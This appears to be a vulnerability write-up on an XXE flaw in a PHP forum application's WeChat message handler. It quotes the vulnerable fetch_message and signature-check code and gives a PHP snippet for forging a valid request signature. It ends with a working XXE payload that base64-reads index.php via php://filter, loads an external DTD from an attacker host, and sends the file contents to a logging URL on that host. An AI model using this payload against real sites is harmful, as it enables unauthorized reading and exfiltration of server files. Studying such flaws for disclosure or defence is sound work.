public function fetch_message(){if ($this->post_data = file_get_contents('php://input')){$post_object = (array)simplexml_load_string($this->post_data, 'SimpleXMLElement', LIBXML_NOCDATA);if ($_GET['encrypt_type'] == 'aes'){$post_object = $this->decrypt_msg($post_object['Encrypt']);}$input_message = array('fromUsername' => $post_object['FromUserName'],'toUsername' => $post_object['ToUserName'],'content' => trim($post_object['Content']),'time' => time(),'msgType' => $post_object['MsgType'],'event' => $post_object['Event'],'eventKey' => $post_object['EventKey'],'mediaID' => $post_object['MediaId'],'format' => $post_object['Format'],'recognition' => $post_object['Recognition'],'msgID' => $post_object['MsgID'],'latitude' => $post_object['Latitude'],'longitude' => $post_object['Longitude'],'precision' => $post_object['Precision'],'location_X' => $post_object['Location_X'],'location_Y' => $post_object['Location_Y'],'label' => $post_object['Label'],'ticket' => $post_object['Ticket'],'createTime' => $post_object['CreateTime'],'status' => $post_object['Status'],'filterCount' => $post_object['FilterCount'],'picUrl' => $post_object['PicUrl'],'encryption' => ($_GET['encrypt_type'] == 'aes') ? true : false);$weixin_info = $this->model('openid_weixin_weixin')->get_user_info_by_openid($input_message['fromUsername']);if ($weixin_info){$this->user_id = $weixin_info['uid'];}if (get_setting('weixin_account_role') == 'service'){$this->bind_message = '你的微信帐号没有绑定 ' . get_setting('site_name') . ' 的帐号, 请<a href="' . $this->model('openid_weixin_weixin')->get_oauth_url(get_js_url('/m/weixin/authorization/')) . '">点此绑定</a>';}return $input_message;}}没有过滤post数据，带入到了simplexml_load_string 然后查找哪里调用了这个函数fetch_message，在app/weixin/api.php调用了这函数public function index_action(){if (!isset($_GET['id'])){$_GET['id'] = 0;}$account_info = $this->model('weixin')->get_account_info_by_id($_GET['id']);$this->model('weixin')->check_signature($account_info['weixin_mp_token'], $_GET['signature'], $_GET['timestamp'], $_GET['nonce']);if (!$account_info OR !$this->model('weixin')->check_signature($account_info['weixin_mp_token'], $_GET['signature'], $_GET['timestamp'], $_GET['nonce'])){   exit();}if ($_GET['echostr']){exit(htmlspecialchars($_GET['echostr']));}if ($account_info['weixin_account_role'] == 'base' OR !$account_info['weixin_app_id'] OR !$account_info['weixin_app_secret']){$account_info['weixin_mp_menu'] = null;}$this->model('weixin')->account_info = $account_info;$input_message = $this->model('weixin')->fetch_message();$this->model('weixin')->response_message($input_message);}
}

if (!$account_info OR !$this->model('weixin')->check_signature($account_info['weixin_mp_token'], $_GET['signature'], $_GET['timestamp'], $_GET['nonce']))
{
exit();
}

public function check_signature($mp_token, $signature, $timestamp, $nonce)
{
$tmp_signature = $this->generate_signature($mp_token, $timestamp, $nonce);if (!$tmp_signature OR $tmp_signature != $signature)
{
return false;
}return true;
}public function generate_signature($token, $timestamp, $nonce)
{
$token = trim($token);if (!$token OR !$timestamp OR !$nonce)
{
return false;
}$tmp_arr = array(
$token,
$timestamp,
$nonce
);sort($tmp_arr, SORT_STRING);return sha1(implode('', $tmp_arr));}

if (!$token OR !$timestamp OR !$nonce) { return false; }

<?php
$token = "testtest";
$timestamp = "a";
$nonce = "b";
$tmp_arr = array( $token, $timestamp, $nonce );
sort($tmp_arr, SORT_STRING);
echo sha1(implode('', $tmp_arr));

<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> <!ENTITY % remote SYSTEM "http://yourvps/xxe/evil.dtd"> %remote; %all; ]> <c>&send;</c></code>

<!ENTITY % send "<!ENTITY external SYSTEM 'http://yourvps/log.php?msg=%payload;'>">